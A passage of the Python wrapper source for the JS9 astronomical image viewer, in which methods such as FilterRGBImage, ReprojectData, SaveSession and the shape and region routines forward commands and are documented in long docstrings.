>>> JS9.FilterRGBImage("convolve", [-1,-1,-1,-1,8,-1,-1,-1,-1])
You can, of course, use the default arguments where applicable.
Note that the standard JS9 colormaps, scale, contrast and bias
selections are applied to the raw data to regenerate the RGB
image. Thus, if you use any of the image processing techniques
listed below and then change colormap, contrast, bias, or
scale, you will undo the applied image processing. This is a
good way to reset the displayed image. The same thing can be
accomplished programmatically by specifying "reset" as the
filter name:
>>> JS9.FilterRGBImage("reset")
The following simple image processing filters are available:
- luminance():convert to greyscale using the CIE luminance:
0.2126*r + 0.7152*g + 0.0722*b
- greyscale():convert to greyscale using the standard greyscale:
0.3*r + 0.59*g + 0.11*b
- greyscaleAvg():convert to greyscale using averaging:
(r+g+b) / 3
- brighten(val): add const val to each pixel to change the brightness:
[r + val, g + val, b + val]
- noise(v1, v2): add random noise:
pixel += Math.floor((Math.random()*(v2-v1)) - v2),
defaults are v1=-30, v2=30
- duotone("r"|"g"|"b"): remove a color by setting it to
the avg of the two others: r=(g+b)/2, default color is "r"
- invert(): the RGB channels of the image are inverted:
[255-r, 255-g, 255-b, a]
- pixelate(size):make image look coarser by creating a square tiling
effect of the specified size, default size is 2
- sepia(): image takes on shades of brown, like an antique photograph
- contrast(val): change the difference in brightness between the min
and max intensity of a pixel, default val is 2
- threshold(thresh, low, high):create a two-color image in which pixels
less bright than thresh are assigned the low value (default 0 for
black), otherwise the high value (default: 255 for white)
- gamma(gcorr): apply the nonlinear gamma operation, used to code and
decode luminance values in video or still image systems:
out = pow(in, gcorr), default gcorr is 0.2
- posterize(): convert a smooth gradation of tone to regions
of fewer tones, with abrupt changes between them
- scatter(): scatters the colors of a pixel in its neighborhood, akin
to viewing through brittle cracked glass
- solarize(): which image is wholly or partially reversed in
tone. Dark areas appear light or light areas appear dark.
The following image convolutions are available:
- convolve(weights, [opaque]) convolve the image using the
weights array as a square convolution matrix. If opaque is true
(default), the image will have an opaque alpha channel, otherwise the
alpha is convolved as well.
- sobel(): use the Sobel operator to create an image that
emphasizes the edges
- medianFilter(): noise reduction technique that replaces each
pixel with the median of neighboring pixels
- gaussBlur5(): image pixel values are blurred using a 5x5 Gaussian
- edgeDetect(): detect edges using the kernel
[ -1, -1, -1, -1, 8, -1, -1, -1, -1 ]
- sharpen(val): sharpen the image using the kernel
[ 0, -3, 0, -3, val, -3, 0, -3, 0 ]
- blur(): blur the image using the kernel
[ 1, 2, 1, 2, 1, 2, 1, 2, 1 ]
- emboss(val): produce embossing effect using the kernel
[-18, -9, 9, -9, 100 - val, 9, 0, 9, 18 ]
- lighten(val): apply the kernel
[ 0, 0, 0, 0, val, 0, 0, 0, 0 ],
default val of 12/9 lightens the image
- darken(val): apply the kernel
[ 0, 0, 0, 0, val, 0, 0, 0, 0],
default val of 6/9 darkens the image
With no arguments, the routine returns an array of available filters:
>>> JS9.FilterRGBImage()
["convolve", "luminance", ..., "blur", "emboss", "lighten", "darken"]
"""
return self.send({'cmd': 'FilterRGBImage', 'args': args})
def ReprojectData(self, *args):
"""
Reproject an image using a specified WCS
call:
JS9.ReprojectData(wcsim, opts)
where:
- wcsim: image containing the WCS used to perform the reprojection
- opts: options object
JS9.ReprojectData() creates a new raw data layer (with default id of
"reproject") in which the pixels are reprojected using the WCS from
another image. The mProjectPP program from the Montage software suite
is used to perform the reprojection. Please read the documentation on
mProjectPP from the Montage web site, which includes this explanation:
mProjectPP performs a plane-to-plane transform on the input
image, and is an adaptation of the Mopex algorithm and
developed in collaboration with the Spitzer Space
Telescope. It provides a speed increase of approximately a
factor of 30 over the general-purpose mProject. However,
mProjectPP is only suitable for projections which can be
approximated by tangent-plane projections (TAN, SIN, ZEA, STG,
ARC), and is therefore not suited for images covering large
portions of the sky. Also note that it does not directly
support changes in coordinate system (i.e. equatorial to
galactic coordinates), though these changes can be facilitated
by the use of an alternate header.
The wcsim argument is an image id, image filename, or image
object pointing to the WCS image.
The opts object can contain the following reproject-specific props:
- rawid: the id of the raw data layer to create (default: "reproject")
- cmdswitches: a string containing mProjectPP command line switches
The cmdswitches will be prepended to the mProjectPP command line:
{cmdswitches: "-d 1 -z .75"}
will set the mProjectPP debugging and the drizzle factor,
resulting in a command line that looks like this:
mProjectPP -d 1 -z .75 -s statusfile in.fits out.fits template.hdr
See the mProjectPP documentation for more information about
command switches.
Reprojection is an intensive process which can take a
considerable amount of memory and processing time. To avoid
crashes, we currently restrict the WCS image size used for
reprojection to a value defined by JS9.REPROJDIM, currently
2200 x 2200. Even this might be too large for iOS devices
under certain circumstances, although issues regarding memory
are evolving rapidly.
"""
return self.send({'cmd': 'ReprojectData', 'args': args})
def RotateData(self, *args):
"""
Rotate an image around the WCS CRPIX point
call:
JS9.RotateData(angle, opts)
where:
- angle: rotation angle in degrees
- opts: options object
The JS9.RotateData() routine uses JS9.ReprojectData() to rotate
image data by the specified angle (in degrees). If the string
"northup" or "northisup" is specified, the rotation angle is set to 0.
The rotation is performed about the WCS CRPIX1, CRPIX2 point.
The optional opts object is passed directly to the JS9.ReprojectData()
routine. See JS9.ReprojectData() above for more information.
"""
return self.send({'cmd': 'RotateData', 'args': args})
def SaveSession(self, *args):
"""
Save an image session to a file
call:
JS9.SaveSession(session)
where:
- session: name of the file to create when saving this session
This routine saves all essential session information about the
currently displayed image (filename, scaling, colormap, contrast/bias,
zoom, regions, catalogs, etc) in a json-formatted file. You can
subsequently load this file into JS9 to restore the image session.
The session file is a text file and can be edited, subject to the
usual rules of json formatting. For example, you can change the
colormap, scaling, etc. after the fact.
Don't forget that the file is saved by the browser, in whatever
location you have set up for downloads.
The session file contains a file property near the top that
specifies the location of the image. A local file usually will
contain an absolute path or a path relative to the web page
being displayed. However, if the image was originally opened
using drag-and-drop, no pathname information is available, in
accordance with standard web security protocols. In this case,
you must edit the session file to supply the path (either
absolute or relative to the web page) before re-loading the
session.
"""
return self.send({'cmd': 'SaveSession', 'args': args})
def LoadSession(self, *args):
"""
Load a previously saved image session from a file
call:
JS9.LoadSession(session)
where:
- session: name of the session file to load
Restore an image session by loading a json-formatted session file. The
image itself is retrieved and loaded, and all of the saved parameters
and graphics (scale, colormap, regions, catalogs etc) are applied to
the display.
The session file contains a file property near the top that
specifies the location of the image. A local file usually will
contain an absolute path or a path relative to the web page
being displayed. However, if the image was originally opened
using drag-and-drop, no pathname information is available, in
accordance with standard web security protocols. In this case,
you must edit the session file to supply the path (either
absolute or relative to the web page) before re-loading the
session.
Note that the raw data file itself is not saved (only its
pathname), so you must have access to that file in order to
restore a session. However, the data file need not be in the
same location as it was originally: you can adjust the path of
the data file by editing the file property as needed.
"""
return self.send({'cmd': 'LoadSession', 'args': args})
def NewShapeLayer(self, *args):
"""
Create a new shape layer
call:
lid = JS9.NewShapeLayer(layer, opts)
where:
- layer: name of the layer to create
- opts: default options for this layer
returns:
- lid: layer id
This routine creates a new named shape layer. You can then, add,
change, and remove shapes in this layer using the routines below. The
catalogs displayed by the Catalog plugin are examples of separate shape
layers. The optional opts parameter allows you to specify default
options for this layer. You can set a default for any property needed
by your shape layer. See JS9.Regions.opts in js9.js for an example of
the default options for the regions layer.
"""
return self.send({'cmd': 'NewShapeLayer', 'args': args})
def ShowShapeLayer(self, *args):
"""
Show or hide the specified shape layer
call:
JS9.ShowShapeLayer(layer, mode)
where:
- layer: name of layer
- mode: true (show layer) or false (hide layer)
Shape layers can be hidden from display. This could be useful, for
example, if you have several catalogs loaded into a display and want to
view one at a time.
If mode is true, a previously hidden shape layer will be displayed. If
mode is false, a displayed shape layer will be hidden. If the
mode argument is not supplied, the current mode is returned.
"""
return self.send({'cmd': 'ShowShapeLayer', 'args': args})
def ToggleShapeLayers(self, *args):
"""
Toggle display of the active shape layers
call:
JS9.ToggleShapeLayers()
While ShowShapeLayer() allows you to display or hide a single shape
layer, this routine will toggle display of all active layers in the
current image. An active layer is one that has not been turned off
usng the Shape Layers plugin or ShowShapeLayer().
The routine remembers which layers were active at the moment when
layers are hidden and restores only those layers in the next toggle.
Thus, if you have two layers, "regions" and "catalog1", and the
"catalog1" layer has previously been turned off, calling this routine
repeatedly will turn on and off the "regions" layer only.
"""
return self.send({'cmd': 'ToggleShapeLayers', 'args': args})
def ActiveShapeLayer(self, *args):
"""
Make the specified shape layer the active layer
call:
JS9.ActiveShapeLayer(layer)
where:
- layer: name of layer
returns:
- active: the active shape layer (if no args are specified)
For a given image, one shape layer at a time is active, responding to
mouse and touch events. Ordinarily, a shape layer becomes the active
layer when it is first created and shapes are added to it. Thus, the
first time you create a region, the regions layer becomes active. If
you then load a catalog into a layer, that layer becomes active.
If no arguments are supplied, the routine returns the currently active
layer. Specify the name of a layer as the first argument to make it
active. Note that the specified layer must be visible.
"""
return self.send({'cmd': 'ActiveShapeLayer', 'args': args})
def AddShapes(self, *args):
"""
Add one or more shapes to the specified layer
call:
JS9.AddShapes(layer, sarr, opts)
where:
- layer: name of layer
- sarr: a shape string, shape object, or an array of shape objects
- opts: global values to apply to each created shape
returns:
- id: id of last shape created
The sarr argument can be a shape ('annulus', 'box', 'circle',
'ellipse', 'point', 'polygon', 'text'), a single shape object, or an
array of shape objects. Shape objects contain one or more properties,
of which the most important are:
- shape: 'annulus', 'box', 'circle', 'ellipse', 'point', 'polygon',
'text' [REQUIRED]
- x: image x position
- y: image y position
- dx: increment from current image x position
- dy: increment from current image y position
- tags: comma separated list of tag strings
- radii: array of radii for annulus shape
- width: width for box shape
- height: height for box shape
- radius: radius value for circle shape
- r1: x radius for ellipse shape (misnomer noted)
- r2: y radius for ellipse shape (misnomer noted)
- pts: array of objects containing x and y positions, for polygons
- points: array of objects containing x and y offsets from the
specified center, for polygons
- angle: angle in degrees for box and ellipse shapes
- color: shape color (string name or #rrggbb syntax)
- text: text associated with text shape
Other available properties include:
- fixinplace: if true, shape cannot be moved or resized
- lockMovementX: shape cannot be moved in the x direction
- lockMovementY: shape cannot be moved in the y direction
- lockRotation: shape cannot be rotated
- lockScalingX: shape cannot be resized in the x direction
- lockScalingY: shape cannot be resized in the y direction
- fontFamily: font parameter for text shape
- fontSize: font parameter for text shape
- fontStyle: font parameter for text shape
- fontWeight: font parameter for text shape
"""
return self.send({'cmd': 'AddShapes', 'args': args})
def RemoveShapes(self, *args):
"""
Remove one or more shapes from the specified shape layer
call:
JS9.RemoveShapes(layer, shapes)
where:
- layer: name of layer
- shapes: which shapes to remove
If the shapes argument is not specified, it defaults to "all". You
can specify a selector using any of the following:
- all: all shapes not including child text shapes
- All: all shapes including child text shapes
- selected: the selected shape (or shapes in a selected group)
- [color]: shapes of the specified color
- [shape]: shapes of the specified shape
- [wcs]: shapes whose initial wcs matches the specified wcs
- [tag]: shapes having the specified tag
- /[regexp]/: shapes with a tag matching the specified regexp
- child: a child shape (i.e. text child of another shape)
- parent: a shape that has a child (i.e. has a text child)
"""
return self.send({'cmd': 'RemoveShapes', 'args': args})
def GetShapes(self, *args):
"""
Get information about one or more shapes in the specified shape
layer
call:
JS9.GetShapes(layer, shapes)
where:
- layer: name of layer
- shapes: which shapes to retrieve
returns:
- sarr: array of shape objects
Each returned shape object contains the following properties:
- id: numeric region id (assigned by JS9 automatically)
- mode: 'add', 'remove', or 'change'
- shape: region shape ('annulus', 'box', 'circle', 'ellipse',
'point', 'polygon', 'text')
- tags: comma delimited list of region tags (e.g., 'source',
'include')
- color: region color
- x,y: image coordinates of region
- size: object containing width and height for box region
- radius: radius value for circle region
- radii: array of radii for annulus region
- eradius: object containing x and y radii for ellipse regions
- pts: array of objects containing x and y positions, for polygons
- angle: angle in degrees for box and ellipse regions
"""
return self.send({'cmd': 'GetShapes', 'args': args})
def ChangeShapes(self, *args):
"""
Change one or more shapes in the specified layer
call:
JS9.ChangeShapes(layer, shapes, opts)
where:
- layer: name of layer
- shapes: which shapes to change
- opts: object containing options to change in each shape
Change one or more shapes. The opts object can contain the parameters
described in the JS9.AddShapes() section. However, you cannot (yet)
change the shape itself (e.g. from 'box' to 'circle').
If the shapes argument is not specified, it defaults to "all". You
can specify a selector using any of the following:
- all: all shapes not including child text shapes
- All: all shapes including child text shapes
- selected: the selected shape (or shapes in a selected group)
- [color]: shapes of the specified color
- [shape]: shapes of the specified shape
- [wcs]: shapes whose initial wcs matches the specified wcs
- [tag]: shapes having the specified tag
- /[regexp]/: shapes with a tag matching the specified regexp
- child: a child shape (i.e. text child of another shape)
- parent: a shape that has a child (i.e. has a text child)
"""
return self.send({'cmd': 'ChangeShapes', 'args': args})
def CopyShapes(self, *args):
"""
Copy a shape layer to another image
call:
JS9.CopyShapes(to, layer)
where:
- to: image id to which to copy shapes
- layer: shape layer to copy
Copy regions to a different image. If to is "all", then the
regions are copied to all images.
All shapes in the shape layer are copied to the new image.
"""
return self.send({'cmd': 'CopyShapes', 'args': args})
def SelectShapes(self, *args):
"""
Gather Shapes into a Selection
call:
JS9.SelectShapes(layer, shapes)
where:
- layer: shape layer
- shapes: which shapes to select
JS9 has a rich mouse-based interface for selecting shapes: a single
shape is selected by clicking on it. A number of shapes can be
gathered into a group selection by pressing the left mouse button and
dragging the mouse over the desired shapes. To add to an
already-existing selection, shift-click the mouse on a shape.
This routine allows you to create a selection programmatically by
specifying which shapes make up the selection. The first argument
is the shape layer. The second argument is the regions selection.
If not specified, it defaults to "all". The call creates a selection
of shapes which can be moved as one unit.
For example:
>>> j.SelectShapes("myreg", "circle") # select all circles
>>> j.SelectShapes("myreg", "circle&&!foo2") # circles w/o 'foo2' tag
Regions in a selection are processed individually, i.e. a regions
selection will match the regions inside a group. Thus for example,
if you create a selection containing circles, changing the color using
the "circle" specification will also affect the circles within the
selection. You can, of course, process only the regions inside a
selection using the selected specification.
"""
return self.send({'cmd': 'SelectShapes', 'args': args})
def UnselectShapes(self, *args):
"""Remove Shapes From a Selection
call:
JS9.UnselectShapes(layer, shapes)
where:
- layer: shape layer
- shapes: which shapes to select
JS9 has a rich mouse-based interface for selecting shapes: a single
shape is selected by clicking on it. A number of shapes can be
gathered into a group selection by pressing the left mouse button and
dragging the mouse over the desired shapes. To add to an
already-existing selection, shift-click the mouse on a shape.
This routine allows you to remove one or more shapes from a shape
selection programmatically by specifying which shapes to remove.
The first argument is the shape layer. The second argument is the
shape selection. In not specified, or specified as "all" or "selected",
the selection is undone. Otherwise the call will make a new
selection, not containing the unselected shapes, which can be
moved as one unit.
"""
return self.send({'cmd': 'UnselectShapes', 'args': args})
def GroupShapes(self, *args):
"""
Gather Shapes into a Long-lived Group
call:
JS9.GroupShapes(layer, shapes, opts)
where:
- layer: shape layer
- shapes: which shapes to group
- opts: optional object containing grouping options
returns:
- groupid: the group id associated with the newly created group
A shape group can be moved and resized as a single unit. To
first order, it is a long-lived form of a region selection.
The latter gets dissolved when you click the mouse outside the
selection, but a shape group is dissolved only by
calling j.UngroupShapes().
This routine allows you to create a group by specifying the shapes
which will compose it. The first argument is the regions selection.
If not specified, it defaults to either 'selected' or 'all', depending
on whether a shape selection currently exits.
The optional opts argument contains the following properties:
- groupid: the group id to use, if possible (default: 'group_[n]')
- select: if false, the group is not selected upon creation
By default, the groupid will be the string 'group_' followed by
an integer chosen so that the groupid is unique. You can supply your
own groupid, but if it already is associated with an existing group,
an integer value will be appended to make it unique. Also, by default
the newly created group will be 'selected'. You can pass
the select property with a value of false in order to
avoid selecting the group (e.g., if you are creating a number of
groups and do not want to see each of them selected in turn.)
The returned groupid string can be used to select and process all the
shapes in that group. Thus, for example, you can use the groupid to
change the color of all grouped shapes:
>>> gid = j.GroupShapes('myreg', 'circle && foo1');
>>> j.ChangeShapes('myreg', gid, {'color':'red'});
Note however, that unlike the temporary shape selections, shapes
in a group are not available individually, i.e., a regions selection
using a non-groupid does not match shapes inside a group. Thus, for
example, if you have created a group of circles, changing the color
using a 'circle' specification does not affect circles within the group:
>>> gid = j.GroupShapes('myreg', 'circle && foo1');
>>> j.ChangeShapes('myreg', 'circle', {'color':'cyan'}) # no
>>> j.ChangeShapes('myreg', gid, {'color':'red'}); # yes
Furthermore, a given shape can only be part of one group at a
time. In the case where a shape already is part of an existing group,
the globalOpts.regGroupConflict property determines how that shape
is processed. The default is skip, meaning that the shape is
silently skipped over when creating the new group. The alternative
is error, which will throw an error.
"""
return self.send({'cmd': 'GroupShapes', 'args': args})
def UngroupShapes(self, *args):
"""
Dissolve a Group of Shapes
call:
JS9.UngroupShapes(layer, groupid, opts)
where:
- layer: shape layer
- groupid: group id of the group to dissolve
- opts: optional object containing ungrouping options
This routine allows you to dissolve an existing group, so that the
shapes contained therein once again become separate. The first
argument is the groupid, previously returned by the JS9.GroupShapes()
call.
The optional opts argument contains the following properties:
- select: newly separate shapes in the group are 'selected'?
By default, the ungrouped shapes unobtrusively take their place among
other shapes on the display. You can make them be selected by
passing the select: true property in opts. Doing this, for
example, would allow you to remove them easily with the Delete key.
For example:
>>> gid = j.GroupShapes('myreg', 'circle || ellipse')
>>> j.UngroupShapes('myreg', gid)
"""
return self.send({'cmd': 'UngroupShapes', 'args': args})
def AddRegions(self, *args):
"""
Add one or more regions to the regions layer
call:
id = JS9.AddRegions(rarr, opts)
where:
- rarr: a shape string, region object or an array of region objects
- opts: global values to apply to each created region
returns:
- id: id of last region created
The rarr argument can be a region shape ('annulus', 'box', 'circle',
'ellipse', 'point', 'polygon', 'text'), a single region object, or an
array of region objects. Region objects contain one or more properties,
of which the most important are:
- shape: 'annulus', 'box', 'circle', 'ellipse', 'point', 'polygon',
'text' [REQUIRED]
- x: image x position
- y: image y position
- lcs: object containing logical x, y and sys (e.g. 'physical')
- dx: increment from current image x position
- dy: increment from current image y position
- tags: comma separated list of tag strings
- radii: array of radii for annulus region
- width: width for box region
- height: height for box region
- radius: radius value for circle region
- r1: x radius for ellipse region (misnomer noted)
- r2: y radius for ellipse region (misnomer noted)
- pts: array of objects containing x and y positions for polygons
- points: array of objects containing x and y offsets from the
center for polygons
- angle: angle in degrees for box and ellipse regions
- color: region color (string name or #rrggbb syntax)
- text: text associated with text region
Other available properties include:
- fixinplace: if true, region cannot be moved or resized
- lockMovementX: region cannot be moved in the x direction
- lockMovementY: region cannot be moved in the y direction
- lockRotation: region cannot be rotated
- lockScalingX: region cannot be resized in the x direction
- lockScalingY: region cannot be resized in the y direction
- fontFamily: font parameter for text region
- fontSize: font parameter for text region
- fontStyle: font parameter for text region
- fontWeight: font parameter for text region
"""
return self.send({'cmd': 'AddRegions', 'args': args})
def GetRegions(self, *args):
"""
Get information about one or more regions
call:
rarr = JS9.GetRegions(regions)
where:
- regions: which regions to retrieve
returns:
- rarr: array of region objects
If the regions argument is not specified, it defaults to
"selected" if there are selected regions, otherwise "all".
Each returned region object contains the following properties:
- id: numeric region id (assigned by JS9 automatically)
- mode: 'add', 'remove' or 'change'
- shape: region shape ('annulus', 'box', 'circle', 'ellipse',
'point', 'polygon', 'text')
- tags: comma delimited list of region tags (e.g., 'source',
'include')
- color: region color
- x,y: image coordinates of region
- radii: array of radii for annulus region
- width: width for box region
- height: height for box region
- radius: radius value for circle region
- r1: x radius for ellipse region (misnomer noted)
- r2: y radius for ellipse region (misnomer noted)
- pts: array of objects containing x and y positions, for polygons
- points: array of objects containing x and y offsets from the
specified center, for polygons
- angle: angle in degrees for box and ellipse regions
- wcsstr: region string in wcs coordinates
- wcssys: wcs system (e.g. 'FK5')
- imstr: region string in image or physical coordinates
- imsys: image system ('image' or 'physical')
"""
return self.send({'cmd': 'GetRegions', 'args': args})
def ListRegions(self, *args):
"""
List one or more regions
call:
JS9.ListRegions(regions, opts)
where:
- regions: which regions to list
- opts: object containing options
List (and return) the specified regions. By default, a light window
is displayed listing all regions (i.e., as if the list option of the
Regions menu had been selected.) You can also list "selected" regions
or use any of the standard regions specifications.
The opts object supports the following properties:
- mode: display/return mode (1,2,3)
- wcssys: wcs system to use (ICRS, FK5, galactic, physical, etc.)
- wcsunits: units for wcs output (sexagesimal, degrees, pixels)
- includejson: include JSON object
- includecomments: include comments
- layer: which layer to display (def: regions layer)
The mode property accepts the following values:
- 1: no display, return full region string including json, comments
- 2: display and return shortened region string (no json, comments)
- 3: display and return full region string (including json, comments)
"""
return self.send({'cmd': 'ListRegions', 'args': args})
def ListGroups(self, *args):
"""
List one or more region/shape groups
call:
JS9.ListGroups(group, opts)
where:
- group: which group(s) to list
- opts: object containing options
List the specified region/shape group(s) in the specified layer
(default is "regions"). The first argument is the groupid of the
group to list, or "all" to list all groups.
The optional opts object can contain the following properties:
- includeregions: display regions as well as the group name (def: true)
- layer: layer to list (def: "regions")
By default, the display will includes the name of the group and the
regions in the group. To skip the display of regions, supply
an opts object with the includeregions property set to False.
For example:
>>> j.ListGroups("all", {"includeregions": false})
grp1
grp2
grp3
>>> j.ListGroups("grp1")
grp1:
circle(3980.00,4120.00,20.00) # source,include,foo1
ellipse(4090.00,4120.00,25.00,15.00,0.0000) # source,include,foo1
"""
return self.send({'cmd': 'ListGroups', 'args': args})
def EditRegions(self, *args):
"""
Edit one or more regions
call:
JS9.EditRegions()
Edit one or more selected regions using an Edit dialog box. If a
single region has been selected by clicking that region, all of its
properties can be edited via the displayed dialog box. If a group of
regions has been selected using Meta-mousemove to highlight one or
more regions, then properties such as color, stroke width, dash
pattern, and tags can be edited for all of the selected regions using
the displayed dialog box. In the latter case, use shift-click to add
additional regions to the edit group.
"""
return self.send({'cmd': 'EditRegions', 'args': args})
def ChangeRegions(self, *args):
"""
Change one or more regions
call:
JS9.ChangeRegions(regions, opts)
where:
- regions: which regions to change
- opts: object containing options to change in each region
Change one or more regions. The opts object can contain the parameters
described in the JS9.AddRegions() section. However, you cannot (yet)
change the shape itself (e.g. from 'box' to 'circle'). See
js9onchange.html for examples of how to use this routine.
If the regions argument is not specified, it defaults to
"selected" if there are selected regions, otherwise "all".
You can specify a region selector using any of the following:
- all: all regions not including child text regions
- All: all regions including child text regions
- selected: the selected region (or regions in a selected group)
- [color]: regions of the specified color
- [shape]: regions of the specified shape
- [wcs]: regions whose initial wcs matches the specified wcs
- [tag]: regions having the specified tag
- /[regexp]/: regions with a tag matching the specified regexp
- child: a child region (i.e. text child of another region)
- parent: a region that has a child (i.e. has a text child)
"""
return self.send({'cmd': 'ChangeRegions', 'args': args})
def CopyRegions(self, *args):
"""
Copy one or more regions to another image
call:
JS9.CopyRegions(to, regions)
where:
- to: image id to which to copy regions
- regions: which regions to copy
Copy regions to a different image. If to is "all", then the
regions are copied to all images.
If the regions argument is not specified, it defaults to
"selected" if there are selected regions, otherwise "all".
You can specify a region selector using any of the following:
- all: all regions not including child text regions
- All: all regions including child text regions
- selected: the selected region (or regions in a selected group)
- [color]: regions of the specified color
- [shape]: regions of the specified shape
- [wcs]: regions whose initial wcs matches the specified wcs
- [tag]: regions having the specified tag
- /[regexp]/: regions with a tag matching the specified regexp
- child: a child region (i.e. text child of another region)
- parent: a region that has a child (i.e. has a text child)
"""
return self.send({'cmd': 'CopyRegions', 'args': args})
def RemoveRegions(self, *args):
"""
Remove one or more regions from the region layer
call:
JS9.RemoveRegions(regions)
where:
- regions: which regions to remove
If the regions argument is not specified, it defaults to
"selected" if there are selected regions, otherwise "all".
You can specify a region selector using any of the following:
- all: all regions not including child text regions
- All: all regions including child text regions
- selected: the selected region (or regions in a selected group)
- [color]: regions of the specified color
- [shape]: regions of the specified shape
- [wcs]: regions whose initial wcs matches the specified wcs
- [tag]: regions having the specified tag
- /[regexp]/: regions with a tag matching the specified regexp
- child: a child region (i.e. text child of another region)
- parent: a region that has a child (i.e. has a text child)
"""
return self.send({'cmd': 'RemoveRegions', 'args': args})
def UnremoveRegions(self, *args):
"""
Unremove one or more previously removed regions
call:
JS9.RemoveRegions()
If you accidentally remove one or more regions, you can use restore
them using this call. JS9 maintains a stack of removed regions (of
size JS9.globalOpts.unremoveReg, current default is 100). Each
time one or more regions is removed, they are stored as a single entry
on this stack. The UnremoveRegions call pops the last entry off
the stack and calls AddRegions.
"""
return self.send({'cmd': 'UnremoveRegions', 'args': args})
def SaveRegions(self, *args):
"""
Save regions from the current image to a file
call:
JS9.SaveRegions(filename, which, layer)
where:
- filename: output file name
- which: which regions to save (def: "all")
- layer: which layer save (def: "regions")
Save the current regions for the displayed image as JS9 regions file.
If filename is not specified, the file will be saved as "js9.reg".
Don't forget that the file is saved by the browser, in whatever
location you have set up for downloads.
If the which argument is not specified, it defaults to "all". You
can specify "selected" to return information about the selected
regions, or a tag value to save regions having that tag.
If the layer argument is not specified, it defaults to "regions",
i.e. the usual regions layer. You can specify a different layer,
e.g., if you want to save a catalog layer as a region file
(since SaveCatalog() will save the data in table format instead
of as regions).
"""
return self.send({'cmd': 'SaveRegions', 'args': args})
def SelectRegions(self, *args):
"""
Group Regions into a Selection
call:
JS9.SelectRegions(regions)
where:
- regions: which regions to select
JS9 has a rich mouse-based interface for selecting regions: a single
region is selected by clicking on it. A number of regions can be
gathered into a group selection by pressing the left mouse button and
dragging the mouse over the desired regions. To add to an
already-existing selection, shift-click the mouse on a region.
This routine allows you to create a selection programmatically by
specifying which regions make up the selection. The first argument is
the regions selection. If not specified, it defaults to "all".
The call makes a selection of regions which can be moved as one unit.
For example:
>>> j.SelectRegions("circle") # select all circles
>>> j.SelectRegions("circle && !foo2") # all circles without tag 'foo2'
Regions in a selection are processed individually, i.e. a regions
selection will match the regions inside a group. Thus for example,
if you create a selection containing circles, changing the color using
the "circle" specification will also affect the circles within the
selection. You can, of course, process only the regions inside a
selection using the selected specification.
"""
return self.send({'cmd': 'SelectRegions', 'args': args})
def UnselectRegions(self, *args):
"""
Remove Regions From a Selection
call:
JS9.UnselectRegions(regions)
where:
- regions: which regions to select
JS9 has a rich mouse-based interface for selecting regions: a single
region is selected by clicking on it. A number of regions can be
gathered into a group selection by pressing the left mouse button and
dragging the mouse over the desired regions. To add to an
already-existing selection, shift-click the mouse on a region.
This routine allows you to remove one or more regions from a region
selection programmatically by specifying which regions to remove.
The first argument is the regions selection. In not specified,
or specified as "all" or "selected", the selection is undone.
Otherwise the call will make a new selection, not containing
the unselected regions, which can be moved as one unit.
For example:
>>> j.UnselectRegions("circle&&!foo2") # unselect circles w/o tag 'foo2'
"""
return self.send({'cmd': 'UnselectRegions', 'args': args})
def GroupRegions(self, *args):
"""
Gather Regions into a Long-lived Group
call:
JS9.GroupRegions(shapes, opts)
where:
- regions: which regions to group
- opts: optional object containing grouping options
returns:
- groupid: the group id associated with the newly created group
A region group can be moved and resized as a single unit. To
first order, it is a long-lived form of a region selection.
The latter gets dissolved when you click the mouse outside the
selection, but a region group is dissolved only by calling
JS9.UngroupRegions().
This routine allows you to create a group by specifying the regions
which will compose it. The first argument is the regions selection.
If not specified, it defaults to either 'selected' or 'all', depending
on whether a region selection currently exits.
The optional opts argument contains the following properties:
- groupid: the group id to use, if possible (default: 'group_[n]')
- select: if false, the group is not selected upon creation
By default, the groupid will be the string 'group_' followed by
an integer chosen so that the groupid is unique. You can supply your
own groupid, but if it already is associated with an existing group,
an integer value will be appended to make it unique. Also, by default
the newly created group will be 'selected'. You can pass
the select property with a value of false in order to
avoid selecting the group (e.g., if you are creating a number of
groups and do not want to see each of them selected in turn.)
The returned groupid string can be used to select and process all the
regions in that group. Thus, for example, you can use the groupid to
change the color of all grouped regions:
>>> gid = j.GroupRegions('circle && foo1');
>>> j.ChangeRegions(gid, {'color':'red'});
Furthermore, when creating a regions file via JS9.SaveRegions(),
the groupid will be stored in each grouped region's JSON object, and
will be used to reconstitute the group when the file is reloaded.
Note however, that unlike the temporary region selections, regions
in a group are not available individually, i.e., a regions selection
using a non-groupid does not match regions inside a group. Thus, for
example, if you have created a group of circles, changing the color
using a 'circle' specification does not affect circles within the group:
>>> gid = j.GroupRegions('circle && foo1');
>>> j.ChangeRegions('circle', {'color':'cyan'}) # won't change group
>>> j.ChangeRegions(gid, {'color':'red'}); # change regions in group
Furthermore, a given region can only be part of one group at a
time. In the case where a region already is part of an existing group,
the globalOpts.regGroupConflict property determines how that region
is processed. The default is skip, meaning that the region is
silently skipped over when creating the new group. The alternative
is error, which will throw an error.
"""
return self.send({'cmd': 'GroupRegions', 'args': args})
def UngroupRegions(self, *args):
"""
Dissolve a Group of Regions
call:
JS9.UngroupRegions(groupid, opts)
where:
- groupid: group id of the group to dissolve
- opts: optional object containing ungrouping options
This routine allows you to dissolve an existing group, so that the
regions contained therein once again become separate. The first
argument is the groupid, previously returned by the JS9.GroupRegions()
call.
The optional opts argument contains the following properties:
- select: newly separate regions in the group are 'selected'?
By default, the ungrouped regions unobtrusively take their place among
other regions on the display. You can make them be selected by
passing the select: true property in opts. Doing this, for
example, would allow you to remove them easily with the Delete key.
For example:
>>> gid = j.GroupRegions('circle || ellipse')
>>> j.UngroupRegions(gid)
"""
return self.send({'cmd': 'UngroupRegions', 'args': args})
def ChangeRegionTags(self, *args):
"""
Change region tags for the specified image(s)
call:
JS9.ChangeRegionTags(which, addreg, removereg)
where:
- which: which regions to process (def: 'all')
- addreg: array or comma-delimited string of regions to add
- removereg: array or comma-delimited string of regions to remove
While region tags can be changed wholesale using JS9.ChangeRegions(),
this routine allows you to add and/or remove specific tags. The first
argument specifies which regions to change. The second argument is a
list of tags to add, while the third argument is a list of tags to
remove. In each case, the tags argument can be an array of tag strings
or a single string containing a comma-separated list of tags:
>>> JS9.ChangeRegionTags('selected', ['foo1', 'foo2'], ['goo1']);
>>> JS9.ChangeRegionTags('selected', 'foo1,foo2', 'goo1');
"""
return self.send({'cmd': 'ChangeRegionTags', 'args': args})
def ToggleRegionTags(self, *args):
"""
Toggle two region tags for the specified image(s)
call:
JS9.toggleRegionTags(which, tag1, tag2)
where:
- which: which regions to process (def: 'all')
- tag1: tag #1 to toggle
- tag2: tag #2 to toggle
While region tags can be changed wholesale using JS9.ChangeRegions(),
this routine allows you to toggle between two tags, e.g., a source
